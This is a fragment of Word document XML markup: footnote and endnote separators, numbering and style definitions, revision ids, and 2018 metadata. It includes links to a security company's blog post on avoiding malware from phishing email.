    <w:sectPr w:rsidR="00BF534B" w:rsidRPr="000122D3" w:rsidSect="00836B2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709" w:rsidRDefault="00827709" w:rsidP="002A28C4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00827709" w:rsidRDefault="00827709" w:rsidP="002A2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707" w:rsidRDefault="006E27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3919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2707" w:rsidRDefault="006E27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956">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>74</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="006E2707" w:rsidRDefault="006E27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707" w:rsidRDefault="006E27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709" w:rsidRDefault="00827709" w:rsidP="002A28C4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00827709" w:rsidRDefault="00827709" w:rsidP="002A2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707" w:rsidRDefault="008277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566063" o:spid="_x0000_s2054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01550301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707" w:rsidRDefault="008277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566064" o:spid="_x0000_s2055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01550301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707" w:rsidRDefault="008277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566062" o:spid="_x0000_s2053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01550301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021F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03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76F53"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F22B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D11C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="814845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8C7B8A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8468EC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0B131A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17D2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C42E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84CE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E627C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F768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A01BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8E2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A1868"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1696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07CB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6A4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E76874"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FA8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D765B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8776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E4"/>
    <w:rsid w:val="000122D3"/>
    <w:rsid w:val="00065D44"/>
    <w:rsid w:val="00085073"/>
    <w:rsid w:val="000A6F39"/>
    <w:rsid w:val="000D35F1"/>
    <w:rsid w:val="000F7780"/>
    <w:rsid w:val="001C0C50"/>
    <w:rsid w:val="001E6065"/>
    <w:rsid w:val="00225798"/>
    <w:rsid w:val="00295A05"/>
    <w:rsid w:val="002A28C4"/>
    <w:rsid w:val="003266E6"/>
    <w:rsid w:val="00334A2E"/>
    <w:rsid w:val="003404A8"/>
    <w:rsid w:val="00384A2C"/>
    <w:rsid w:val="003A6824"/>
    <w:rsid w:val="00424411"/>
    <w:rsid w:val="004B4847"/>
    <w:rsid w:val="0052191F"/>
    <w:rsid w:val="00551E35"/>
    <w:rsid w:val="00596FC4"/>
    <w:rsid w:val="005D4D57"/>
    <w:rsid w:val="005D509C"/>
    <w:rsid w:val="005E210F"/>
    <w:rsid w:val="00640C02"/>
    <w:rsid w:val="006502D2"/>
    <w:rsid w:val="006B0F9F"/>
    <w:rsid w:val="006E2707"/>
    <w:rsid w:val="00726FB3"/>
    <w:rsid w:val="007962BE"/>
    <w:rsid w:val="007B2701"/>
    <w:rsid w:val="008103CF"/>
    <w:rsid w:val="00827709"/>
    <w:rsid w:val="00836B25"/>
    <w:rsid w:val="0085349E"/>
    <w:rsid w:val="008C06B1"/>
    <w:rsid w:val="00901DFA"/>
    <w:rsid w:val="00942562"/>
    <w:rsid w:val="0094531C"/>
    <w:rsid w:val="00964886"/>
    <w:rsid w:val="009953AB"/>
    <w:rsid w:val="009C6071"/>
    <w:rsid w:val="009E3956"/>
    <w:rsid w:val="00A962C0"/>
    <w:rsid w:val="00AA07C0"/>
    <w:rsid w:val="00AB47E4"/>
    <w:rsid w:val="00B01218"/>
    <w:rsid w:val="00B069E4"/>
    <w:rsid w:val="00B80BE0"/>
    <w:rsid w:val="00BC292F"/>
    <w:rsid w:val="00BF534B"/>
    <w:rsid w:val="00C23E54"/>
    <w:rsid w:val="00C52807"/>
    <w:rsid w:val="00C639B9"/>
    <w:rsid w:val="00C76113"/>
    <w:rsid w:val="00C86433"/>
    <w:rsid w:val="00CE1945"/>
    <w:rsid w:val="00D03204"/>
    <w:rsid w:val="00D50020"/>
    <w:rsid w:val="00D86F4C"/>
    <w:rsid w:val="00E03838"/>
    <w:rsid w:val="00E46D9B"/>
    <w:rsid w:val="00E6393E"/>
    <w:rsid w:val="00F004BD"/>
    <w:rsid w:val="00FB340B"/>
    <w:rsid w:val="00FC2E31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13096462-3ED0-4FFA-A7AC-7C847F3B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B47E4"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AB47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32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8C4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002A2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agedatasecurity.com/blog/how-to-avoid-malware-infection-from-a-phishing-emai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ww.sagedatasecurity.com/ndiscovery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cp:lastPrinted>2018-10-05T14:36:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-04T14:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-08T13:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>